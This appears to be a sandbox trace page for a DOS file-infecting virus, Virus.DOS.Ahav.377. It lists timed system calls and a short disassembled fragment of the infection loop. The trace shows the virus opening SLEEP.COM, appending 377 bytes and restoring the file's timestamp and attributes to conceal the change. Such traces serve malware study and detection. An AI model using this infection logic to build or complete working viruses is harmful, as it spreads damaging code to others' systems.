Sample viewer

vx.netlux.org/Virus.DOS.Ahav.377

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:17:02.38220189Z 53 PC: 12a81 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:17:02.38361948Z 37 PC: 12a92 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:17:02.384675326Z 26 PC: 12aa5 | Set disk transfer address
2018-12-17T22:17:02.385589828Z 78 PC: 12ab0 | Find first file
2018-12-17T22:17:02.392067857Z 61 PC: 12abb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:17:02.396322751Z 63 PC: 12ac7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:17:02.402514347Z 62 PC: 12af5 | Close file
2018-12-17T22:17:02.40453942Z 67 PC: 12b01 | Get or set file attributes
2018-12-17T22:17:02.830418096Z 61 PC: 12b0a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:17:02.836989551Z 44 PC: 12b0f | Get time 0x12b0f: mov word ptr [bp + 0x229], dx
0x12b13: call 0x12b83
0x12b16: mov ax, 0x5700
0x12b19: mov dx, word ptr [bp + 0x12b]
0x12b1d: mov cx, word ptr [bp + 0x129]
0x12b21: inc ax
0x12b22: int 0x21
0x12b24: mov ah, 0x3e
0x12b26: int 0x21
0x12b28: mov ax, 0x4300
0x12b2b: lea dx, word ptr [bp + 0x297]
0x12b2f: xor cx, cx
0x12b31: inc ax
0x12b32: mov cl, byte ptr [bp + 0x128]
0x12b36: int 0x21
0x12b38: jmp 0x12b43
0x12b3a: mov ah, 0x3e
0x12b3c: int 0x21
0x12b3e: mov ah, 0x4f
0x12b40: jmp 0x12aae
2018-12-17T22:17:02.840315047Z 66 PC: 12b8f | Move file pointer
2018-12-17T22:17:02.84167901Z 64 PC: 12ba1 | Write file or device (Write 377 bytes on handle 5)
2018-12-17T22:17:02.84945574Z 66 PC: 12baa | Move file pointer
2018-12-17T22:17:02.850662073Z 64 PC: 12bb5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:17:02.857277505Z 87 PC: 12b24 | Get or set file date and time
2018-12-17T22:17:02.858606032Z 62 PC: 12b28 | Close file
2018-12-17T22:17:02.866411421Z 67 PC: 12b38 | Get or set file attributes
2018-12-17T22:17:02.875832024Z 26 PC: 12b4a | Set disk transfer address
2018-12-17T22:17:02.876800844Z 37 PC: 12b5b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')